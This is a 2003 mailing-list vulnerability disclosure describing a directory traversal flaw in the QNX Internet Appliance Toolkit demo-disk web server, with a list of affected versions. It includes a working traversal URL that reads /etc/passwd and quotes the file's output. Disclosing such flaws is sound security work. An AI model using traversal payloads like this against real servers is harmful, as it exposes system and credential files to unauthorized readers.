Local file retrieving in QNX Internet Appliance Toolkit http-daemon (web.server)

From: Michael Bemmerl (securityat_private)
Date: Sat Jun 21 2003 - 18:59:49 PDT

    Local file retrieving in QNX Internet Appliance Toolkit http-daemon
    (web.server)

    Vendor-URL: http://www.qnx.com

    --====--

    I recently found a 3,5"-disk labeled with QNX-demo on my desk. This is
    the "Take the 1.44M Web Challenge!"-disk I got it in 1998. I couldn't find
    the demo on the qnx-website, but i found it on another site:
    http://public.planetmirror.com/pub/qnx/demodisk/ (v4.00) Anyway, the
    webserver doesn't check the url's, so you can view any text-file on the
    diskette.

    Affected (and tested) versions:
    --========--

        v1.1
        Modem v3.03
        Network v4.00
        Network v405
        Modem v405

    Vulnerability:
    --====--

    The document-root of the webserver is /usr/httpd, so type this URL in the
    embedded webbrowser:

    http://127.1/../../etc/passwd

    and you'll see the /etc/passwd:
    root::0:0:/usr/httpd:/bin/sh
    bin::1:0:/bin:

    Thanks for reading, greets to all,

    Michael

    P.S.: This is my first vulnerability :-)